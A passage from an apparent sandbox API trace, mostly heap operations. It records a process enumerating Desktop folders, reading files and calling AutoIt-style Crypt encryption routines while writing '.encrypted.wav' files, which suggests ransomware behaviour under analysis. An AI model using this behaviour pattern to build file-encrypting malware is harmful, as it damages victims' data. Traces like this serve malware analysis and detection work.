out: lpMsg=0x6aed6c) returned 0 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0031.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100) returned 0x7c77b8 [0031.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c7b50 [0031.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c7c18 [0031.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c77b8 | out: hHeap=0x770000) returned 1 [0031.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0031.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7b50 | out: hHeap=0x770000) returned 1 [0031.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0031.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c7b50 [0031.565] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\wtgkl2xg7q876lp8absn")) returned 0x10 [0031.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7b50 | out: hHeap=0x770000) returned 1 [0031.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7c18 | out: hHeap=0x770000) returned 1 [0031.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0031.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0031.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.565] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.encrypted.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\wtgkl2xg7q876lp8absn\\uzxbvza9thehqnqn.encrypted.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0031.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0031.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0031.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0031.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.566] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0031.566] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0031.566] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0031.566] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0031.567] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0031.567] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0xb402, lpOverlapped=0x0) returned 1 [0031.569] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0031.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb402) returned 0x955018 [0031.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0031.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0031.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb402) returned 0x88ffb0 [0031.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0031.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.571] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb402) returned 0x955018 [0031.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0031.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0031.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.571] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0031.572] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.572] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0031.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb402) returned 0x955018 [0031.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0031.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0031.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdd8 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0031.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb402) returned 0x89b3c0 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0031.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.574] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0031.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0031.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0031.574] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0031.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0031.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.574] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0031.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2d8 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0031.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897d8 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0031.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0031.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.575] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0031.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0031.575] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 